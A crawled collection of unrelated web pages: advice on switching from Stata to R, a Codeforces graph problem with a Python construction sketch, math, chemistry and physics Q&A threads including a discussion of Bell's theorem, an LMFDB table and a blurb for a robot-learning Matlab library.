## Total | 85.2503743 99 .861114892 Root MSE = .92563
##
## ------------------------------------------------------------------------------
## y | Coef. Std. Err. t P>|t| [95% Conf. Interval]
## -------------+----------------------------------------------------------------
## x1 | -.0224969 .0970207 -0.23 0.817 -.2150562 .1700624
## x2 | .1403954 .0888485 1.58 0.117 -.0359443 .316735
## _cons | -.1980435 .0943158 -2.10 0.038 -.3852343 -.0108527
## ------------------------------------------------------------------------------
## .
## Summing Up
Moving parts of your work from Stata to R is totally feasible. Lots of people (for example, in the thread that touched this post off, Steve Rodgers) really want to take advantage of the superior graphics capabilities of R, especially the ggplot ecosystem, even while sticking to Stata for most of their work. Once your feet are wet, you may then decide R’s many other benefits (the free part, the super-helpful community, the transferable job skills you can teach your students, the free part, the cutting-edge stuff available years before it’s in Stata, the way RStudio makes it dead easy to do reproducible research through dynamic documents and version control, and, once again, the free part) make switching over all the way to be worth the additional marginal effort. Or you may not.
I completed the transition in three or four years, at my own pace: when I felt comfortable moving another chunk of my workflow over to R, I did, but not before. If I were doing it over right now, with the tidyverse packages dramatically reducing the slope of the learning curve, I might move faster, but there’s no rush, really. Do what works for you.
• This post by John Ricco describing how to translate Stata data cleaning commands to the dplyr idiom will likely be helpful to those new to tidyverse-style R and wanting to move quickly.
• Matthieu Gomez’s R for Stata Users is a more detailed phrasebook that will also be useful to new switchers (H/T Arthur Yip).4
• I also ran across the Rcall package while writing this up, but I haven’t tried it. You may find it useful.
• OTOH, these 2010 slides by Oscar Torres-Reyna were definitely useful to me back in the day, but as they pre-date both the tidyverse and RStudio—the wonders of which really cannot be overstated—they’re now more likely to cause you unnecessary confusion than help you if you’re a new switcher. Better to steer clear.
• Great complete treatments on how to do stuff in R:
• RStudio’s Cheat Sheets are also great references.
• When you’re ready to take the step to using R more than Stata, you’ll want to get fully set up on RStudio, which provides a front end for running R and can integrate with git and GitHub for version control (you will want this). The best resource that I’ve found for this process is Jenny Bryan’s Happy Git and GitHub for the UseR.
• The R community on StackOverflow is full of helpful people. As your Google-fu develops, you’ll find that links to StackOverflow are most likely to get you where you need to go.
• There are so many fantastic #rstats (dozens? hundreds?) follows on Twitter. With apologies to the—seriously—hundreds of others who’ve taught me tons of stuff over the years, I’m going to grit my teeth and rec just five to get you started: Mara Averick, Jenny Bryan, David Robinson, Julia Silge, and Hadley Wickham.
## References
Bryan, Jenny. 2018. “Happy Git and Github for the useR.” http://happygitwithr.com/.
Chang, Winston. “Cookbook for R.” http://www.cookbook-r.com.
Ismay, Chester, and Albert Y. Kim. 2018. “Modern Dive: An Introduction to Statistical and Data Sciences via R.” https://moderndive.com/.
Kastellec, Jonathan P., and Eduardo L. Leoni. 2007. “Using Graphs Instead of Tables in Political Science.” Perspectives on Politics 5(4): 755–71.
Wickham, Hadley, and Garrett Grolemund. 2017. R for Data Science. O’Reilly. http://r4ds.had.co.nz.
1. Then, for me, it was multiple imputation, parallel computation, and the dot-and-whisker plots of regression coefficients introduced to political science by Kastellec and Leoni (2007). On this last one, see also the dotwhisker package. Now my list is different, but even longer. That's not what I want to get into in this post, though. This post is how, not why.
2. See the technical note to the help file for rsource for details.
3. In the argot (heh), this means the stata command in the RStata package.
4. Arthur also recommends vikjam's Mostly Harmless Replication, which replicates most of the figures and tables of Mostly Harmless Econometrics in both Stata and R (and many in Python and Julia as well). Though not intended as a guide for switchers, the site will be helpful to fans of the book looking for ways to implement its advice in R.
http://codeforces.com/problemset/problem/916/C

C. Jamie and Interesting Graph
time limit per test: 2 seconds
memory limit per test: 256 megabytes
input: standard input
output: standard output
Jamie has recently found undirected weighted graphs with the following properties very interesting:
• The graph is connected and contains exactly n vertices and m edges.
• All edge weights are integers and are in range [1, 10⁹] inclusive.
• The length of shortest path from 1 to n is a prime number.
• The sum of edges' weights in the minimum spanning tree (MST) of the graph is a prime number.
• The graph contains no loops or multi-edges.
If you are not familiar with some terms from the statement you can find definitions of them in notes section.
Help Jamie construct any graph with given number of vertices and edges that is interesting!
Input
First line of input contains 2 integers n, m — the required number of vertices and edges.
Output
In the first line output 2 integers sp, mstw (1 ≤ sp, mstw ≤ 10¹⁴) — the length of the shortest path and the sum of edges' weights in the minimum spanning tree.
In the next m lines output the edges of the graph. In each line output 3 integers u, v, w (1 ≤ u, v ≤ n, 1 ≤ w ≤ 10⁹) describing the edge connecting u and v and having weight w.
Examples
Input
4 4
Output
7 7
1 2 3
2 3 2
3 4 2
2 4 4
Input
5 4
Output
7 13
1 2 2
1 3 4
1 4 3
4 5 4
Note
The graph of sample 1: Shortest path sequence: {1, 2, 3, 4}. MST edges are marked with an asterisk (*).
Definition of terms used in the problem statement:
A shortest path in an undirected graph is a sequence of vertices (v1, v2, ..., vk) such that vi is adjacent to vi+1 for 1 ≤ i < k and the sum of the edge weights w(vi, vi+1) along the sequence is minimized, where w(i, j) is the edge weight between i and j. (https://en.wikipedia.org/wiki/Shortest_path_problem)
A prime number is a natural number greater than 1 that has no positive divisors other than 1 and itself. (https://en.wikipedia.org/wiki/Prime_number)
A minimum spanning tree (MST) is a subset of the edges of a connected, edge-weighted undirected graph that connects all the vertices together, without any cycles and with the minimum possible total edge weight. (https://en.wikipedia.org/wiki/Minimum_spanning_tree)
https://en.wikipedia.org/wiki/Multiple_edges
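One possible construction (a sketch of a common approach, not the official editorial; it assumes n ≥ 2 and m ≥ n − 1, which the elided constraints should guarantee): make the path 1-2-...-n simultaneously the shortest 1→n path and the MST, give it a prime total weight, and pad the remaining edge slots with weight-10⁹ edges that cannot improve either quantity.

```python
# Sketch of an "interesting graph" construction for the problem above.
def next_prime(k):
    def is_prime(x):
        if x < 2:
            return False
        d = 2
        while d * d <= x:
            if x % d == 0:
                return False
            d += 1
        return True
    while not is_prime(k):
        k += 1
    return k

def interesting_graph(n, m):
    big = 10**9
    p = next_prime(max(n - 1, 2))        # prime total weight of the chain
    edges = [(1, 2, p - (n - 2))]        # first edge absorbs the remainder
    edges += [(i, i + 1, 1) for i in range(2, n)]
    # pad with heavy edges between non-consecutive vertex pairs until m edges exist
    u, v = 1, 2
    while len(edges) < m:
        v += 1
        if v > n:
            u += 1
            v = u + 2                    # skip (u, u+1): already a chain edge
        edges.append((u, v, big))
    return p, p, edges

sp, mst, edges = interesting_graph(4, 4)
print(sp, mst)
for u, v, w in edges:
    print(u, v, w)
```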
https://askdev.io/questions/53970/r-dimensional-mesh-inquiry

# r-dimensional mesh question
I am attempting to compute the average distance between any two nodes in an $r$-dimensional mesh.
This is a $3$-dimensional mesh with $n=3$.
There are $\left(n^r \left(n^r - 1\right)\right)/2$ ways of picking any two points in the mesh.
So if we pick two points in the mesh, $p_{\lbrace 1, 2, ..., r \rbrace}$ and $q_{\lbrace 1, 2, ..., r \rbrace}$, the distance is computed as the Manhattan distance
$\sum_{i=1}^{r} \left| {q_i - p_i} \right|$
Now I need to find the total distance between all nodes and divide that by the number of ways of picking two nodes (given above).
I know how to do this by considering this 3-dimensional case, which should carry over to the r-dimensional case as well, but I am having trouble expressing it in some kind of summation notation.
Below is how I think I can get the total distance between all nodes; I hope this is clear.
In this 3-d mesh let us assume the nodes are labelled $\left( 1, 1, 1 \right)$ to $\left( 3, 3, 3\right)$. Let's start at $\left( 1, 1, 1 \right)$ and sum up the distance between this node and all other nodes. Then we move to $\left( 1, 1, 2 \right)$ and sum up the distances between this node and all other nodes except $\left( 1, 1, 1 \right)$, because we have already counted the distance between $\left( 1, 1, 1 \right)$ and $\left( 1, 1, 2 \right)$. Then we move on to $\left( 1, 1, 3 \right)$ and sum up all except $\left( 1, 1, 1 \right)$ and $\left( 1, 1, 2 \right)$. We continue this until we permute through, in order, $\left( 1, 1, 1 \right)$, $\left( 1, 1, 2 \right)$, $\left( 1, 1, 3 \right)$, $\left( 1, 2, 1 \right)$, $\left( 1, 2, 2 \right)$, etc... Does that make sense?
That should give me the total distance without counting anything twice. Then I divide that by the number of ways of picking two nodes and I will have the average distance. Does this sound correct to you? Any help would be appreciated.
This approach is correct, but more work than required. Using the taxicab metric, each dimension is independent. Taking a cube of side n, you can count the vertical segments used as follows: from the bottom layer to the next layer up, we count $n^2$ (points below the layer) times $n^2*(n-1)$ (points above the bottom layer) = $n^4*(n-1)$. For the next layer you have $2*n^2*n^2*(n-2)$ and so on. The $n^4$s factor out, and you can just think of the total distance along a line of length n. This is $\sum_{i=1}^{i=n}i*(n-i)$. Then multiply by $n^4$ and you have the total usage in the vertical direction. Then multiply by 3 for the total usage in each direction. And divide by the number of pairs of points, which you have already calculated. The extension to a different number of dimensions or to non-cubical meshes should be clear.
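A quick numerical cross-check of this answer (my own sketch, not part of the original thread): brute-force the average Manhattan distance over a small mesh and compare it with the per-dimension counting recipe, generalized from 3 to $r$ dimensions as total-per-dimension $= n^{2(r-1)}\sum_{i=1}^{n} i(n-i)$.

```python
# Compare brute force against the per-dimension counting formula.
from itertools import product

def brute_force_average(n, r):
    points = list(product(range(1, n + 1), repeat=r))
    total, pairs = 0, 0
    for i in range(len(points)):
        for j in range(i + 1, len(points)):
            total += sum(abs(a - b) for a, b in zip(points[i], points[j]))
            pairs += 1
    return total / pairs

def formula_average(n, r):
    per_dim = n ** (2 * (r - 1)) * sum(i * (n - i) for i in range(1, n + 1))
    pairs = n ** r * (n ** r - 1) / 2
    return r * per_dim / pairs

for n, r in [(3, 2), (3, 3), (4, 3)]:
    print(n, r, brute_force_average(n, r), formula_average(n, r))
```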
https://socratic.org/questions/5831ace67c01494c8f7b7a3c

# What is the difference between ground state electron configurations and otherwise?
Nov 26, 2016
You can treat the ground-state electron configuration as basically a point of reference that is (at the moment) lowest in energy.
You could go in three directions from the ground-state:
• Ionization by removal of an electron (forming ${\text{B}}^{+}$)
• Ionization by addition of an electron (forming ${\text{B}}^{-}$)
• Promotion of an electron to a higher energy level (forming $\text{B}^{*}$)
Let's take boron as a normal example. Boron's ground-state configuration is $1s^2 2s^2 2p^1$.
2p: [↑ ] [  ] [  ]
2s: [↑↓]
1s: [↑↓]
(1) Removal of an electron
If an electron is removed, it corresponds to an ionization energy; energy is required to remove an electron from boron, so ${\text{IE}}_{1}$ is positive.
The new electron configuration, for ${\text{B}}^{+}$, is $1s^2 2s^2 2p^0$ (the $2p^0$ is to emphasize the absence of that electron).
2p: [  ] [  ] [  ]
2s: [↑↓]
1s: [↑↓]
(2) Addition of an electron
If an electron is added, it corresponds to an electron affinity. Electron affinity basically describes what happens to the energy of the atom when you add an electron to it.
That is, if ${\text{EA}}_{1} > 0$, then you destabilize the atom (which is why electron affinities for noble gases are positive). For boron, it is $- \text{27.0 kJ/mol}$, so boron is slightly stabilized when it gains one electron.
The new electron configuration, of ${\text{B}}^{-}$, is then $1s^2 2s^2 2p^2$.
2p: [↑ ] [↑ ] [  ]
2s: [↑↓]
1s: [↑↓]
(3) Promotion of electron to higher energy level
You can do this by shooting, say, the right wavelength of laser at a sample of boron, and some of the sample will get excited, giving the electron exactly the right energy to get promoted to a higher energy level.
A valid new energy level for boron is the $3 s$ orbital:
3s: [↑ ]
2p: [  ] [  ] [  ]
2s: [↑↓]
1s: [↑↓]
That would be known as an electronic excitation. That changes the electron configuration to the one for $\text{B}^{*}$:
$1s^2 2s^2 2p^0 3s^1$
The $2 p$ subshell becomes empty because the only electron in it was excited up to the $3 s$ orbital.
(This is an unstable state, so soon after it forms, the electron will fall back down to the original $2p$ orbital and we'll see the ground state again, $1s^2 2s^2 2p^1$.)
https://nigerianscholars.com/past-questions/physics/question/288175/
# I. Density of the liquid. II. Depth below the surface of the liquid. III. Surface...
### Question
I. Density of the liquid.
II. Depth below the surface of the liquid.
III. Surface area of the liquid.
On which of the statements above does pressure depend?
### Options
A) I and II only.
B) II and III only.
C) I, II and III only.
D) I and III only.
### Explanation:
Pressure in a liquid is independent of the cross-sectional area of the container/liquid.
∴ the correct options are I & II
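For reference (an addition, not part of the original explanation), the relation behind this answer is the hydrostatic pressure formula, in which only depth, density and $g$ appear:

$$P = h\rho g$$

so the surface area of the liquid does not enter at all.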
## Discussion (1)
• Pressure in a liquid is independent of the cross-sectional area of the container/liquid.
∴ the correct options are I & II
https://www.conservapedia.com/Special:MobileDiff/789234

# Changes
An '''irrational number''' is a [[real number]] that cannot be expressed as the ratio of two [[integers]]. Irrational numbers often arise as solutions to problems involving rational numbers. For example, the square root of 2 is irrational. Other irrationals, such as [[pi]], serve as fundamental constants in many mathematical problems. Irrational numbers can never be expressed exactly using decimal notation with a finite number of digits. Instead it is common to write them using only enough significant digits to solve the problem at hand, followed by an ellipsis (…):

:$\pi\ = 3.1415926...$

==See also==

[[Transcendental numbers]]

[[Category:Mathematics]]
https://stats.stackexchange.com/questions/123265/monte-carlo-simulations-with-multiple-random-variables

# Monte-Carlo Simulations with multiple random variables
I have the following observation model: $y_i=x_i+a_i$, where $a_i$ is a Gaussian random variable whose mean is a function of a uniform random variable $b_i$. I have designed $\hat{x}_i$, an estimator of $x_i$, and would like to evaluate its performance using Monte-Carlo simulations. I use the following logic, which I would appreciate it if you could criticize:
For i = 1:I
    n = 0
    Generate an $x_i$ uniformly from a given distribution
    for j = 1:J
        Generate $b_j$ as a r.v. from a given uniform distribution
        for k = 1:K
            Generate $a_{jk}$ as a normal r.v. conditional on $b_j$
            Generate synthetic data: $y_{jk}=x_i+a_{jk}$
            Obtain $\hat{x}_n$ using $y_{jk}$
            n++
        end
    end
    find $\hat{x}_i$ as the average of the $\hat{x}_n$
end
calculate the RMS of the error.
Note that the distributions of $a$ and $b$ can be anything. However, I don't have access to the joint PDF's. Instead I have the following:
• The distribution of $x$
• The distribution of $b$
• The distribution of $a|b$
• Your model description is incomplete: how are x, a, and b related in a joint probabilistic model? If there are repeated measures, how are they connected with the variables? Introduce double or triple indices in the first equation. Without this description, the three levels of loops in your pseudo-code are delicate to justify or criticise. – Xi'an Nov 9 '14 at 11:41
• have edited my description. I hope it's clearer now. – Pioneer83 Nov 9 '14 at 21:22
• Thanks. In that case, do you want to check the error conditional on $X=x_i$? Otherwise, I would use a single loop, instead of three. The RMSE should be the average of the $(\hat{x}_i-x_i)^2$ so why compute an average of $\hat{x}_i$'s? – Xi'an Nov 9 '14 at 21:29
• Well, to avoid outliers effect, one should have a loop for each random variable (my understanding). So, I have a loop t to pick $x_i$ then generate differtent $a_i$'s in an inner loop. But because the distirbution of $a_i$ dependes on $b_i$ I added middle loop to generate $b$'s. – Pioneer83 Nov 9 '14 at 21:57
• Once again, I see no reason to have more than a single loop. If there is a possibility of outliers in your simulation, it should be either barred from the simulating mechanism or else incorporated in the model, because otherwise the Monte Carlo results cannot be trusted. – Xi'an Nov 10 '14 at 19:35
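Following the single-loop suggestion in the comments, here is a minimal sketch of how such a Monte Carlo evaluation could look. The specific distributions, the mean function of $b$, and the toy estimator are stand-ins chosen purely for illustration; they are not part of the original question.

```python
# Single-loop Monte Carlo RMSE estimate under assumed stand-in distributions:
# x ~ U(0, 10), b ~ U(0, 1), a | b ~ N(mu(b), 1), y = x + a.
import numpy as np

rng = np.random.default_rng(0)

def mu(b):                      # assumed mean function of the uniform r.v. b
    return 2.0 * b

def estimator(y, expected_a):   # toy estimator: subtract the known mean of a
    return y.mean() - expected_a

K = 50                          # observations per replication
reps = 20_000
sq_errors = np.empty(reps)

for rep in range(reps):
    x = rng.uniform(0.0, 10.0)          # draw the quantity to estimate
    b = rng.uniform(0.0, 1.0, size=K)   # draw b for each observation
    a = rng.normal(mu(b), 1.0)          # a | b is Gaussian with mean mu(b)
    y = x + a                           # observation model
    x_hat = estimator(y, expected_a=2.0 * 0.5)  # E[a] = E[mu(b)] = 1.0
    sq_errors[rep] = (x_hat - x) ** 2

print("RMSE:", np.sqrt(sq_errors.mean()))
```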
https://www.physicsforums.com/threads/typing-equations-in-microsoft-word-2007.220267/

# Typing equations in Microsoft Word 2007
1. Mar 6, 2008
### mbrmbrg
Does anyone know how to use the equations editor in microsoft word 2007?
When I go to the insert tab, I can insert symbols, but the equations option is grayed out. I do NOT have the patience to sit there finicking with formatting, etc. just to see
$$Ax^2+Bx+C=0$$
$$x=\frac{-B\pm\sqrt{B^2-4AC}}{2A}$$
or something even harder to format (like an equation involving total differential or something).
Any ideas?
2. Mar 6, 2008
### Staff: Mentor
If the equations option in the drop down menu is not available, then that option was not installed. If you have the Office 2007 CD (or Word) then one should be able to install it.
Otherwise one can use super- and subscripts in the set of Commands on the Customize toolbar > Format > superscript or subscript. That can enable one to do simple polynomials, exponents and indices. Otherwise one needs to install the equation editor or use a TeX (LaTeX) editor.
3. Mar 6, 2008
### mbrmbrg
Aaack!
OK, that's it. I'll talk to the head of the physics department and ask him to kindly get equations installed. Manual formatting (especially when the program loves to automatically format everything) is not my cup of tea.
Then again... I really like LaTeX. Do you know how to install a TeX editor?
4. Mar 6, 2008
5. Mar 6, 2008
Right-o.
Thanks!
6. Apr 7, 2008
### shouga
How can I calculate the average in Microsoft Word 2007,
and is the equation tool only for appearance, or can it calculate?
7. Jan 6, 2011
### Mirakelman
Also, if the file you're working on is saved as .doc the button will be grayed out as well.
I'm digging up this thread because it's one of the first results google gave me when I searched for this anomaly.
8. Jul 18, 2012
### darussiaman
Yes! That's exactly the issue I came up against. What can be done about the fact that it's grayed out? Anything? Yes, I do have it installed because I can use the equation editor thing on .docx documents.
Ditto.
9. Jul 18, 2012
### Mirakelman
Just save the document as .docx.
10. Jul 18, 2012
### bobm
Also, the "old" equation editor (aka Microsoft Equation 3.0) is still in Word 2007/2008/2010/2011, and it can be used in either .doc documents or .docx documents. To get to it in Word 2007, in the Text group of the Insert tab, click on Object. From there, it's similar to previous versions of Word. (Look for Microsoft Equation in the list of "Objects".) | 2017-02-26 08:07:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5019952654838562, "perplexity": 3354.6639176087797}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171936.32/warc/CC-MAIN-20170219104611-00335-ip-10-171-10-108.ec2.internal.warc.gz"} |
https://www.physicsforums.com/threads/local-hidden-variable-model-that-equals-qm-predictions.921985/

# B Local Hidden Variable Model That Equals QM Predictions?
1. Aug 5, 2017
### morrobay
With E(a,b) = ∫ dλ C(a, a', b, b', λ), suppose λ depends independently/locally on detector setting choices at A and B.
For example, suppose there are 360 detector settings at A and 360 at B, corresponding to 360 particle/detector interactions/outcomes at A = ±1 and also at B = ±1. Then, as θ = β − α, there are 360² possible thetas.
If these thetas, when applied to P++ = P-- = 1/2 sin²(θ/2) and to P-+ = P+- = 1/2 cos²(θ/2),
are in agreement with QM predictions: Bell inequality violations
(that of course include the 360 cases when α = β, sin 0 = 0, cos 0 = 1),
then could a computer simulation for the 360² θ's verify if this local, deterministic hidden variable model fits the facts?
2. Aug 5, 2017
### Staff: Mentor
Bell's theorem shows that it is mathematically impossible for a model of the type you describe to match the QM predictions for all possible combinations of angles for A and B. Such a model can match QM predictions for some combinations, but not all combinations. So no such model can fit the facts.
3. Aug 6, 2017
### entropy1
You seem to assume knowledge of θ. I am not sure if that is local.
Last edited: Aug 6, 2017
4. Aug 7, 2017
### Zafa Pi
I believe that both @PeterDonis and @entropy1 are correct, but the latter is more directly germane to your proposal. Alice & Bob are far apart (not local) when setting their angles and neither knows what the other's setting is. So how does one know which of your 360² to select? If A & B are close and can communicate then all bets are off, i.e. they can make any correlations they want.
5. Aug 7, 2017
### morrobay
All the 360² possible thetas are applied for computing all the possible outcomes of the model, to see if it equals the QM predictions
as well as the recorded experimental outcomes. E(a,b) = ∫ dλ C(a, a', b, b', λ)
Model outcomes only depend on the settings at space-like separated A and B and λ (particle properties).
For photons all the thetas are applied to E(a,b) = cos²θ − sin²θ
S = E(a,b) − E(a,b') + E(a',b) + E(a',b')
S_HV ≤ 2, S_QM = 2√2
For spin-1/2 particles all the thetas are applied to the cos² and sin² formulas to produce the model curve for comparison to this graph.
Or they could be applied to any inequality of this sort: N(a+b−) + N(b+c−) ≥ N(a−c+)
So knowledge about theta (β − α) is not needed for the model testing the QM predictions, only a computer simulation over all thetas.
Last edited: Aug 7, 2017
6. Aug 8, 2017
### DrChinese
The thing is, as PeterDonis mentioned, this is exactly what has been looked at many times before. Bell's Theorem precludes this from working. You only need to check it for 3 pairs of angles to see the problem:
0/120 degrees
120/240 degrees
0/240 degrees
Try hand inserting actual values for these 3 angles 0/120/240 for a series of trials (it is easier if you work with the correlated case rather than the anti-correlated case). These cannot have pairwise values that match (or mismatch depending on setup) less than 1/3 (unless you know in advance which pair you are going to choose). QM predicts 1/4. This more or less corresponds to the graph you provided for the 30 degrees and 60 degrees cases.
When you hand insert values - that's so you can cherry pick to try and make it work out - you realize quickly that you can only make things work out if you cheat. I.e.you know which pair of angles you are selecting in advance. And if you cheat like that, you can make any formula work out. Even the QM prediction.
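For what it is worth, here is a small sketch (my own illustration of the argument above, assuming the correlated photon case in which the QM match probability at relative angle θ is cos²θ): it exhaustively checks every deterministic pre-programmed answer sheet for the three settings 0/120/240 degrees and confirms that the average match rate can never drop below 1/3, whereas QM predicts 1/4.

```python
# Exhaustive check of all deterministic answer sheets for three settings.
from itertools import product
import math

pairs = [(0, 1), (1, 2), (0, 2)]            # the three ways to pick two settings

lowest = 1.0
for sheet in product([+1, -1], repeat=3):   # predetermined outcome per setting
    rate = sum(sheet[i] == sheet[j] for i, j in pairs) / len(pairs)
    lowest = min(lowest, rate)

theta = math.radians(120)                   # every pair of settings differs by 120 (or 240) degrees
qm_match = math.cos(theta) ** 2             # QM match probability = 1/4

print(f"lowest average match rate any answer sheet can give: {lowest:.3f}")   # 0.333...
print(f"QM prediction for the same settings:                 {qm_match:.3f}") # 0.250
```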
7. Aug 8, 2017
### Zafa Pi
@morrobay, are you proposing a way to violate a Bell inequality without using entangled particles?
8. Aug 8, 2017
### morrobay
Not at all. This is a train of thought continued from the Entangled Particles thread, page 1. See my post #32. Item 2. Correlations encoded during preparation of entanglement.
9. Aug 8, 2017
### Zafa Pi
Are you trying to give an explanation for the correlations that infect entangled particles? Why do you need a 360 by 360 table when, as @DrChinese pointed out, a 3 by 3 should suffice? If you want a classical explanation, how about dBB or ER = EPR?
I don't know why I'm saying all this since I really don't understand what you're trying to do.
10. Aug 9, 2017
### entropy1
What is the matter about Item 2, @morrobay ?
11. Aug 9, 2017
### Zafa Pi
Hidden variables = item 2, for what its worth.
12. Aug 10, 2017
### morrobay
If you scroll down in the paper to page 5/13 (on printout) to :
A plot of the simple linear correlation profile and the qm profile is shown below.
PLOT
These profiles agree only for measurements differing by 0, π/2 and π. For all other cases the simple pre-programmed linear model fails to match the qm predictions,
(the sin²(θ/2) and cos²(θ/2) formulas). That is understood.
Now the following is exactly what my question in this topic is:
" This raises the interesting question of whether any pre programmed response profile can reproduce the predictions of qm (and the experimental results)
Suppose each particle is programmed with a more complicated profile of responses as a function of the measurement angle"
This would incorporate the 360² thetas in my proposal.
The paper then continues to show why this is clearly ruled out.
I notice that you, Zafa Pi, have a math background. Perhaps you could elaborate on why this model is ruled out. Thank you.
http://www.mathpages.com/home/kmath521/kmath521.htm
13. Aug 10, 2017
### Jilang
My understanding is that all probabilities must add to one and none can be negative. If you allow the negative ones however...
14. Aug 10, 2017
### DrChinese
If you can see it is ruled out (much as Bell first showed us), what more is there?
As to the 360^2: the 3 angles I provided (0, 120, 240 degrees) should ALSO be enough to demonstrate why your idea doesn't work. Just write out a sequence of those - say 10. You will see that no matter what values you provide, the average will be at least 1/3. The quantum mechanical prediction is 1/4. It works the same way on most any 3 angles, but the important point is that experiment rules out your idea (unless there is superluminal signalling).
And my 3 angles are way easier to calculate than yours - by a factor of more than 10,000,000. Just sayin'...
15. Aug 10, 2017
### Zafa Pi
Neither A or B knows what angle the other measured, and they are far apart. How do your preprogramed entities know what values to deliver from your table? Are you proposing they somehow know what A and B did and thus immediately give the appropriate responses to match those of the entangled photons?
16. Aug 10, 2017
### cube137
just a simple inquiry.. I know there are non-local hidden variables.. but are there non-deterministic hidden variables too or are all hidden variables deterministic?
if there are nondeterministic-non local hidden variables.. how does this differ to Copenhagen then?
17. Aug 11, 2017
### Zafa Pi
@morrobay, You can find the clarification in Bell's original paper.
I'm having computer problems with this site, so I'm quitting for a while.
18. Aug 11, 2017
### morrobay
1° through 360° measurement outcomes are recorded at both A and B. Then all 360² thetas
can be produced for comparing experimental and calculated results. The question now is not about the experimental setup
but rather a section in this paper: http://www.mathpages.com/home/kmath521/kmath521.htm
(Scroll down to the first plot shown of the simple linear correlation profile and QM profile. Then in the paragraph below the plot start here:
" Suppose each particle is programmed with a more complicated profile of responses as a function of the measurement angle"
Can you elaborate on the math shown that rules out such a particle being in agreement with QM
predictions in relation to the Bell inequality ?
Last edited: Aug 11, 2017
19. Aug 11, 2017
### Staff: Mentor
What sort of elaboration are you looking for? If you could tell us which part is not clear and needs further explanation, we may be able to help.
20. Aug 11, 2017
### morrobay
Before referencing the math in question I want to restate/update. The original idea was that there could be pre-programmed and fixed responses for entangled particles at all 360° settings, such that outcomes at any combination of angles at space-like separated A and B could agree with QM predictions and therefore violate the inequality. I.e., the long-distance non-classical correlations are encoded during entanglement preparation. So there are 360² possible thetas.
Now there is a sidetrack question: if, as said above, 360 measurement outcomes are recorded at A and 360 at B (not at parallel settings but at random, so that A and B each have outcomes from a stream of identically prepared entangled particles for 360 settings), is it valid to combine them all to make up the 360² thetas β − α?
In other words, is it valid for this particular model to combine an outcome at a setting at A of 80° from one pair, and then from another pair an outcome at B at 333°? To say it this way: in this model, could the results from two different pairs, A at 80° and B at 333°, be equal to the outcomes for one pair measured at A, 80° and B, 333°? If this is invalid then all 360² measurements could be made.
Now the math in question: (4), the integral that equals −cos(θ).
If this equals the QM prediction for the correlation from the said pre-programmed particle, then why is it ruled out in the following paragraph:
"This is because the increase in correlation is proportional to the increase in θ arising from the transition at α = π − θ."
Last edited: Aug 11, 2017
21. Aug 11, 2017
### Staff: Mentor
And that is not possible. Bells theorem basically says that if the results are encoded during preparation, then the correlations must obey the inequality. And as @DrChinese has repeatedly pointed out, you should try finding an encoding that leads to a violation of the inequality for just three angles ($0$,$2\pi/3$, $4\pi/3$); you won't be able to.
You can do that, but the resulting table will not have the property that when the two angles are the same, the results of the two measurements are never the same. Thus, it fails to match observation even before we consider any inequalities.
22. Aug 11, 2017
### entropy1
@morrobay Perhaps you mean to form a table for A and B out of actual experimental data. You have to keep in mind then that the prefabricated data for A and B is local. The orientation of the detectors may be changed while the pair of particles is already produced (and the HV with them). In that case, if A=0°, then we have a set of 360 outcomes for possible angles for B. But if we, say, choose 10° for A, we have the same 360 possible outcomes for B! A and B are separated, and will not agree to QM outcomes.
Last edited: Aug 11, 2017
https://plainmath.net/19719/let-be-the-relation-from-equal-to-equal-defined-by-xry-if-and-only-if-equal

Question
# Let R be the relation from X={1,2,3,5} to Y={0,3,4,9} defined by xRy if and only if x^2=y
Discrete math
Let R be the relation from X={1,2,3,5} to Y={0,3,4,9} defined by xRy if and only if $$\displaystyle x^{2}=y$$
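A quick way to see which pairs belong to R (a small sketch added for illustration, since the page breaks off before an answer) is simply to check every pair:

```python
# Enumerate the relation R = {(x, y) : x in X, y in Y, x^2 = y}.
X = {1, 2, 3, 5}
Y = {0, 3, 4, 9}
R = {(x, y) for x in X for y in Y if x ** 2 == y}
print(sorted(R))   # [(2, 4), (3, 9)]
```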
http://www.lmfdb.org/LocalNumberField/?p=2&n=5
Results (displaying both matches)
| Polynomial | $p$ | $e$ | $f$ | $c$ | Galois group | Slope content |
|---|---|---|---|---|---|---|
| $x^{5} + x^{2} + 1$ | 2 | 1 | 5 | 0 | $C_5$ (as 5T1) | $[\ ]^{5}$ |
| $x^{5} - 2$ | 2 | 5 | 1 | 4 | $F_5$ (as 5T3) | $[\ ]_{5}^{4}$ |
http://barog.net/projects/1_project/

# SSLVQ: A self-supervised online multi-view learning vector quantization framework for object affordance learning.
SSLVQ is a Matlab library distributed to accompany the publication of my Ph.D. thesis and 2015 IJARS journal article and was developed in order to enable developmental learning of object affordance categories for autonomous robots.
Our object affordance learning scenario.
Multi-view learning, sometimes also referred to using the terms ‘cross-modal learning’, ‘multi-modal learning’ or ‘co-clustering’ is a type of machine learning where, rather than being isolated to a single feature space, learning is instead performed over multiple separate feature spaces, otherwise known as ‘data views’ or ‘modalities’, in which data co-occur. Given this common theme, the learning goal may otherwise differ depending on the particular context. In our object affordance learning scenario, object properties such as shape features define the feature space in one data view, the input space $X \subseteq \mathbb{R}^m$, whereas object effects observed from interaction, such as motion features and changes in shape features, define the feature space in another data view, the output space $Y \subseteq \mathbb{R}^n$. We assume that matching data co-occur in each of them.
Visualisation of SSLVQ cross-view Hebbian projection.
